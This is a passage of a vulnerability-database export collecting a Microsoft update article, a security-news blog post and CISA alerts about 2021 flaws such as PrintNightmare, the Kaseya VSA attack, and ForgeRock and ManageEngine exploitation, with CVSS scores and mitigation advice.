you might not get the correct Furigana characters. You might need to enter the Furigana characters manually. **Note** The affected apps are using the **ImmGetCompositionString()** function.| This issue is resolved in KB5005101. \nDevices with Windows installations created from custom offline media or custom ISO image might have [Microsoft Edge Legacy](<https://support.microsoft.com/en-us/microsoft-edge/what-is-microsoft-edge-legacy-3e779e55-4c55-08e6-ecc8-2333768c0fb0>) removed by this update, but not automatically replaced by the new Microsoft Edge. 
This issue is only encountered when custom offline media or ISO images are created by slipstreaming this update into the image without having first installed the standalone servicing stack update (SSU) released March 29, 2021 or later. **Note** Devices that connect directly to Windows Update to receive updates are not affected. This includes devices using Windows Update for Business. Any device connecting to Windows Update should always receive the latest versions of the SSU and latest cumulative update (LCU) without any extra steps.| To avoid this issue, be sure to first slipstream the SSU released March 29, 2021 or later into the custom offline media or ISO image before slipstreaming the LCU. To do this with the combined SSU and LCU packages now used for Windows 10, version 20H2 and Windows 10, version 2004, you will need to extract the SSU from the combined package. Use the following steps to extract the SSU:\n\n 1. Extract the cab from the msu via this command line (using the package for KB5000842 as an example): **expand Windows10.0-KB5000842-x64.msu /f:Windows10.0-KB5000842-x64.cab <destination path>**\n 2. Extract the SSU from the previously extracted cab via this command line: **expand Windows10.0-KB5000842-x64.cab /f:* <destination path>**\n 3. You will then have the SSU cab, in this example named **SSU-19041.903-x64.cab**. Slipstream this file into your offline image first, then the LCU.\nIf you have already encountered this issue by installing the OS using affected custom media, you can mitigate it by directly installing the [new Microsoft Edge](<https://www.microsoft.com/edge>). If you need to broadly deploy the new Microsoft Edge for business, see [Download and deploy Microsoft Edge for business](<https://www.microsoft.com/edge/business/download>). \nAfter installing this update, you might have issues printing to certain printers. 
Various brands and models are affected, primarily receipt or label printers that connect via USB. **Note** This issue is not related to [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) or [CVE-2021-1675](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675>).| This issue is resolved in KB5004237. \nAfter installing the May 25, 2021 (KB5003214) and June 21, 2021 (KB5003690) updates, some devices cannot install new updates, such as the July 6, 2021 (KB5004945) or later updates. You will receive the error message, \"PSFX_E_MATCHING_BINARY_MISSING\".| For more information and a workaround, see KB5005322. \nUniversal Windows Platform (UWP) apps might not open on devices that have undergone a Windows device reset. This includes operations that were initiated using Mobile Device Management (MDM), such as Reset this PC, Push-button reset, and Autopilot Reset. UWP apps you downloaded from the Microsoft Store are not affected. Only a limited set of apps are affected, including:\n\n * App packages with framework dependencies\n * Apps that are provisioned for the device, not per user account.\nThe affected apps will fail to open without error messages or other observable symptoms. They must be re-installed to restore functionality.| This issue is addressed in KB5015878 for all releases starting June 21, 2021 and later. \n \n## How to get this update\n\n**Before installing this update**\n\nMicrosoft now combines the latest servicing stack update (SSU) for your operating system with the latest cumulative update (LCU). 
For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.\n\n**Prerequisite:**\n\nFor Windows Server Update Services (WSUS) deployment:\n\n * Install the May 11, 2021 update (KB5003173) before you install the latest cumulative update.\nFor offline Deployment Image Servicing and Management (**DISM.exe**) deployment:\n\n * If an image does not have the February 24, 2021 (KB4601382) or later cumulative update, install the January 12, 2021 SSU (KB4598481) and the May 11, 2021 update (KB5003173).\n\n**Install this update**\n\n**Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update or Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nWindows Update for Business| No| No longer available. \nMicrosoft Update Catalog| No| No longer available. \nWindows Server Update Services (WSUS)| No| No longer available. \n \n**If you want to remove the LCU**\n\nTo remove the LCU after installing the combined SSU and LCU package, use the [DISM/Remove-Package](<https://docs.microsoft.com/en-us/windows-hardware/manufacture/desktop/dism-operating-system-package-servicing-command-line-options>) command line option with the LCU package name as the argument. You can find the package name by using this command: **DISM /online /get-packages**. Running [Windows Update Standalone Installer](<https://support.microsoft.com/en-us/topic/description-of-the-windows-update-standalone-installer-in-windows-799ba3df-ec7e-b05e-ee13-1cdae8f23b19>) (**wusa.exe**) with the **/uninstall** switch on the combined package will not work because the combined package contains the SSU. 
You cannot remove the SSU from the system after installation.\n\n**File information**\n\nFor a list of the files that are provided in this update, download the [file information for cumulative update 5004945](<https://download.microsoft.com/download/6/0/4/6046cc97-919a-434d-86de-db2fe63580d0/5004945.csv>). For a list of the files that are provided in the servicing stack update, download the [file information for the SSU - version 19041.1081, 19042.1081, and 19043.1081](<https://download.microsoft.com/download/6/2/d/62d4d81c-0498-4abf-95e7-b9be18ddcabd/SSU_version_19041_1081.csv>). \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-06T00:00:00", "type": "mskb", "title": "July 6, 2021\u2014KB5004945 (OS Builds 19041.1083, 19042.1083, and 19043.1083) Out-of-band", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-06T00:00:00", "id": "KB5004945", "href": "https://support.microsoft.com/en-us/help/5004945", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "avleonov": [{"lastseen": "2021-08-03T08:35:33", "description": "Hello 
guys! The second episode of Last Week\u2019s Security news from June 28 to July 4.\n\nThe most interesting vulnerability of the last week is of course [Microsoft Print Spooler "PrintNightmare"](<https://www.tenable.com/blog/cve-2021-1675-proof-of-concept-leaked-for-critical-windows-print-spooler-vulnerability>). By [sending an RpcAddPrinterDriverEx() RPC request](<https://www.kb.cert.org/vuls/id/383432>), for example over SMB, a remote, authenticated attacker may be able to execute arbitrary code with SYSTEM privileges on a vulnerable Windows system. And there is a public PoC exploit for this vulnerability published by the Chinese security firm Sangfor. And there is a strange story here. It turns out that Sangfor published an exploit for a 0day vulnerability. But they thought this vulnerability (CVE-2021-1675) had already been patched as part of the June Microsoft Patch Tuesday. And then it turned out that this was a bug in the Microsoft patch. But Microsoft wrote that this is a different, new vulnerability, CVE-2021-34527, and so there were no problems with the previous patch. In any case, a patch for this vulnerability has not yet been released and [Microsoft is suggesting two Workarounds](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). Option 1 - Disable the Print Spooler service, Option 2 - Disable inbound remote printing through Group Policy. Do this first for Domain Controllers and other critical Windows servers. All versions of Windows contain the vulnerable code and are susceptible to exploitation. Also note that the new vulnerability has a flag Exploitation Detected on the MS site. \n\nThe most interesting attack of the week is [Kaseya VSA Supply-Chain Attack](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689>). Kaseya Limited is an American software company that develops software for managing networks, systems, and information technology infrastructure. 
[Kaseya VSA](<https://www.kaseya.com/products/vsa/>) (Virtual System Administrator) is a cloud-based MSP (Managed Service Provider) platform that allows providers to perform patch management and client monitoring for their customers. So, the REvil gang used around [30 MSPs across the US, AUS, EU, and LATAM where Kaseya VSA was deployed to encrypt over 1,000 businesses](<https://www.reddit.com/r/msp/comments/ocggbv/crticial_ransomware_incident_in_progress/>). It is now believed that this was an attack on on-premises VSA servers using SQL injection and authentication bypass vulnerabilities. Well, by agreeing to use an MSP, be prepared for such surprises.\n\nContinuing the topic of vulnerabilities in services that simplify system administration, the Finnish cybersecurity company Nixu [has published a writeup for a Remote Code Execution](<https://www.nixu.com/blog/remote-code-execution-vulnerability-microsoft-intune-managed-windows-devices>) vulnerability in Microsoft Intune managed Windows devices ([CVE-2021-31980](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31980>)) from the June Patch Tuesday. "This proof-of-concept shows that remote attackers can run code with system privileges on a Windows machine by intercepting the TLS connections. This vulnerability could be exploited to install malware to the victim\u2019s machine to take persistent full control over it". Intune Management Extension updates itself without any user action when the computer is connected to the internet. But computers not connected to the internet might still run the vulnerable version on startup.\n\nI liked the [new Metasploit module](<https://vulners.com/metasploit/MSF:EXPLOIT/LINUX/LOCAL/DOCKER_RUNC_ESCAPE/>) that leverages a flaw in `runc` to escape a Docker container and get command execution on the host as root. 
It overwrites the `runc` binary with the payload and waits for someone to use `docker exec` to get into the container.\n\nAnd I want to mention these vulnerabilities: \n\n * [Microsoft Translation Bugs Open Edge Browser to Trivial UXSS Attacks.](<https://threatpost.com/microsoft-edge-browser-uxss-attacks/167389/>) "Remotely inject and execute arbitrary code on any website just by sending a message".\n * [Pre-Auth Remote Code Execution Vulnerability (CVE-2021-35464)](<https://blog.rapid7.com/2021/06/30/forgerock-openam-pre-auth-remote-code-execution-vulnerability-what-you-need-to-know/>) in ForgeRock Access Manager.\n * The vulnerability in Windows 10 allows a low-privileged user to [wipe out arbitrary files needed for UEFI boot](<https://www.thezdi.com/blog/2021/6/30/cve-2021-26892-an-authorization-bypass-on-the-microsoft-windows-efi-system-partition>).\n * [Western Digital's older network-attached storage systems](<https://www.darkreading.com/attacks-breaches/mybook-investigation-reveals-attackers-exploited-legacy-0-day-vulnerabilities/d/d-id/1341440>) allowed unauthenticated commands to trigger a factory reset, formatting the hard drives.\n * Microsoft Discloses [Critical Bugs Allowing Takeover](<https://thehackernews.com/2021/06/microsoft-discloses-critical-bugs.html>) of [NETGEAR Routers](<https://www.netgear.com/support/product/DGN2200v1.aspx>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-05T15:19:07", "type": "avleonov", "title": "Last Week\u2019s Security news: PrintNightmare, Kaseya, Intune, Metasploit Docker escape", "bulletinFamily": "blog", "cvss2": 
{"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-26892", "CVE-2021-31980", "CVE-2021-34527", "CVE-2021-35464"], "modified": "2021-07-05T15:19:07", "id": "AVLEONOV:30285D85FDB40C8D55F6A24D9D446ECF", "href": "http://feedproxy.google.com/~r/avleonov/~3/iv5hnOt7XD8/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2021-07-08T18:09:13", "description": "_(Updated July 2, 2021) _For new information and mitigations, see [Microsoft's updated guidance for the Print spooler vulnerability (CVE-2021-34527)](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>).\n\n_(Updated July 1, 2021) _See [Microsoft's new guidance for the Print spooler vulnerability (CVE-2021-34527)](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) and apply the necessary workarounds. 
\n\n_(Original post June 30, 2021)_ The CERT Coordination Center (CERT/CC) has released a [VulNote](<https://www.kb.cert.org/vuls/id/383432>) for a critical remote code execution vulnerability in the Windows Print spooler service, noting: \u201cwhile Microsoft has released an [update for CVE-2021-1675](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675>), it is important to realize that this update does not address the public exploits that also identify as CVE-2021-1675.\u201d An attacker can exploit this vulnerability\u2014nicknamed PrintNightmare\u2014to take control of an affected system.\n\nCISA encourages administrators to disable the Windows Print spooler service in Domain Controllers and systems that do not print. Additionally, administrators should employ the following best practice from Microsoft\u2019s [how-to guides](<https://docs.microsoft.com/en-us/defender-for-identity/cas-isp-print-spooler>), published January 11, 2021: \u201cDue to the possibility for exposure, domain controllers and Active Directory admin systems need to have the Print spooler service disabled. 
The recommended way to do this is using a Group Policy Object.\u201d \n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/06/30/printnightmare-critical-windows-print-spooler-vulnerability>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-06-30T00:00:00", "type": "cisa", "title": "PrintNightmare, Critical Windows Print Spooler Vulnerability ", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-02T00:00:00", "id": "CISA:367C27124C09604830E0725F5F3123F7", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/06/30/printnightmare-critical-windows-print-spooler-vulnerability", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-08T18:12:56", "description": "Microsoft has released 
[out-of-band security updates](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) to address a remote code execution (RCE) vulnerability\u2014known as PrintNightmare (CVE-2021-34527)\u2014in the Windows Print spooler service. According to the CERT Coordination Center (CERT/CC), \u201cThe Microsoft Windows Print Spooler service fails to restrict access to functionality that allows users to add printers and related drivers, which can allow a remote authenticated attacker to execute arbitrary code with SYSTEM privileges on a vulnerable system.\u201d\n\nThe updates are cumulative and contain all previous fixes as well as protections for CVE-2021-1675. The updates do not include Windows 10 version 1607, Windows Server 2012, or Windows Server 2016\u2014Microsoft states updates for these versions are forthcoming. Note: According to CERT/CC, \u201cthe Microsoft update for CVE-2021-34527 only appears to address the Remote Code Execution (RCE via SMB and RPC) variants of the PrintNightmare, and not the Local Privilege Escalation (LPE) variant.\u201d See [CERT/CC Vulnerability Note VU #383432](<https://www.kb.cert.org/vuls/id/383432>) for workarounds for the LPE variant.\n\nCISA encourages users and administrators to review the [Microsoft Security Updates](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) as well as [CERT/CC Vulnerability Note VU #383432](<https://www.kb.cert.org/vuls/id/383432>) and apply the necessary updates or workarounds. 
For additional background, see [CISA\u2019s initial Current Activity on PrintNightmare](<https://us-cert.cisa.gov/ncas/current-activity/2021/06/30/printnightmare-critical-windows-print-spooler-vulnerability>).\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/07/06/microsoft-releases-out-band-security-updates-printnightmare>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-06T00:00:00", "type": "cisa", "title": "Microsoft Releases Out-of-Band Security Updates for PrintNightmare", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-06T00:00:00", "id": "CISA:6C836D217FB0329B2D68AD71789D1BB0", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/07/06/microsoft-releases-out-band-security-updates-printnightmare", 
"cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-02T18:08:35", "description": "SolarWinds has released an [advisory](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211>) addressing a vulnerability\u2014CVE-2021-35211\u2014affecting Serv-U Managed File Transfer and Serv-U Secure FTP. Exploitation of this vulnerability may allow a remote attacker to take control of an affected system. Note: this vulnerability does not affect any other SolarWinds or N-able (formerly SolarWinds MSP) products. \n \nMicrosoft [has reported](<https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/>) limited and targeted attacks using a 0-day exploit against this vulnerability.\n\nCISA encourages users and administrators to review the SolarWinds [advisory](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211>) and install the necessary updates.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/07/13/solarwinds-releases-advisory-serv-u-vulnerability>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-13T00:00:00", "type": "cisa", "title": "SolarWinds Releases Advisory for Serv-U Vulnerability", "bulletinFamily": "info", "cvss2": 
{"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35211"], "modified": "2021-07-13T00:00:00", "id": "CISA:2E658D779271DB98A2BD53EE81F29F3B", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/07/13/solarwinds-releases-advisory-serv-u-vulnerability", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-26T18:29:35", "description": "On September 16, CISA released [a joint alert ](<https://us-cert.cisa.gov/ncas/alerts/aa21-259a>)on exploitation of a vulnerability (CVE-2021-40539) in ManageEngine ADSelfService Plus. On November 8, security researchers from Palo Alto Networks and Microsoft Threat Intelligence Center (MSTIC) released separate reports on targeted attacks against ManageEngine ADSelfService Plus. 
\n\nCISA encourages organizations to review the indicators of compromise and other technical details in the following reports to uncover any malicious activity within their networks.\n\n * Palo Alto Networks: [Targeted Attack Campaign Against ManageEngine ADSelfService Plus Delivers Godzilla Webshells, NGLite Trojan and KdcSponge Stealer](<https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/>)\n * MSTIC: [Threat actor DEV-0322 exploiting ZOHO ManageEngine ADSelfService Plus](<https://www.microsoft.com/security/blog/2021/11/08/threat-actor-dev-0322-exploiting-zoho-manageengine-adselfservice-plus/>)\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/11/09/security-researchers-reveal-activity-targeting-manageengine>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-09T00:00:00", "type": "cisa", "title": "Security Researchers Reveal Activity Targeting ManageEngine ADSelfService Plus", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": 
"AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2021-11-09T00:00:00", "id": "CISA:2D62C340878780A9844A8FFDFA548783", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/11/09/security-researchers-reveal-activity-targeting-manageengine", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-26T18:13:07", "description": "Malicious cyber actors are actively exploiting a pre-authorization remote code execution vulnerability (CVE-2021-35464) in ForgeRock Access Management\u2014a commercial open access management solution that is based on OpenAM, an open-source access management solution. An attacker exploiting this vulnerability can execute commands in the context of the current user. The vulnerability affects Access Management versions 6.0.0.x, 6.5.0.x, 6.5.1, 6.5.2.x and 6.5.3 and older unsupported versions.\n\nCISA recommends Access Management users:\n\n * Review the [ForgeRock Security Advisory](<https://backstage.forgerock.com/knowledge/kb/article/a47894244>) and the [Australian Cyber Security Centre Alert](<https://www.cyber.gov.au/acsc/view-all-content/alerts/forgerock-open-am-critical-vulnerability>);\n * Check for vulnerable instances of the Access Management software (see [ForgeRock\u2019s Technical Impact Assessment](<https://backstage.forgerock.com/cloud-storage-ws/api/v1/cloudstorage/getfile/oEQfKvz8SWSCaq8F2bfwhw>)); and\n * Prioritize deploying an update to Access Management version 7 or apply the workaround urgently.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product 
survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/07/12/critical-forgerock-access-management-vulnerability>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-12T00:00:00", "type": "cisa", "title": "Critical ForgeRock Access Management Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35464"], "modified": "2021-07-12T00:00:00", "id": "CISA:3A09D1755051967FC65BD11A814E9167", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/07/12/critical-forgerock-access-management-vulnerability", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-26T18:13:24", "description": "The Federal Bureau of Investigation (FBI), CISA, and Coast Guard Cyber Command (CGCYBER) have released [a Joint Cybersecurity Advisory (CSA)](<https://us-cert.cisa.gov/ncas/alerts/aa21-259a>) detailing the active exploitation of an authentication bypass vulnerability (CVE-2021-40539) in Zoho ManageEngine ADSelfService Plus\u2014a self-service password management and 
single sign-on solution. The FBI, CISA, and CGCYBER assess that advanced persistent threat (APT) cyber actors are likely among those exploiting the vulnerability. The exploitation of this vulnerability poses a serious risk to critical infrastructure companies, U.S.-cleared defense contractors, academic institutions, and other entities that use the software.\n\nCISA strongly encourages users and administrators to review [Joint FBI-CISA-CGCYBER CSA: APT Actors Exploiting Newly Identified Vulnerability in ManageEngine ADSelfService Plus](<https://us-cert.cisa.gov/ncas/alerts/aa21-259a>) and immediately implement the recommended mitigations, which include updating to [ManageEngine ADSelfService Plus build 6114](<https://pitstop.manageengine.com/portal/en/community/topic/adselfservice-plus-6114-security-fix-release>).\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/09/16/fbi-cisa-cgcyber-advisory-apt-exploitation-manageengine>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-16T00:00:00", "type": "cisa", "title": "FBI-CISA-CGCYBER Advisory on APT Exploitation of ManageEngine ADSelfService Plus Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2021-09-16T00:00:00", "id": "CISA:28BCD901AF6661FE02928495E4D03129", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/09/16/fbi-cisa-cgcyber-advisory-apt-exploitation-manageengine", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-26T18:12:13", "description": "The Federal Bureau of Investigation (FBI), CISA, and Coast Guard Cyber Command (CGCYBER) have updated the [Joint Cybersecurity Advisory (CSA)](<https://us-cert.cisa.gov/ncas/alerts/aa21-259a>) published on September 16, 2021, which details the active exploitation of an authentication bypass vulnerability (CVE-2021-40539) in Zoho ManageEngine ADSelfService Plus\u2014a self-service password management and single sign-on solution.\n\nThe update provides details on a suite of tools APT actors are using to enable this campaign: 